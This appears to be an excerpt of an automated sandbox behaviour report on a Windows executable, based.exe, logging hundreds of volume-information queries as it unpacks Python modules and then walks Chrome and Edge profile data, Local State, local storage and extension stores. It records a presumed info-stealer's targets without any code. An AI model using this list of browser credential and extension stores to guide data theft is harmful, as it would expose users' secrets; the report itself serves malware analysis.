                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_queue.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache VolumeInformationJump to behavior
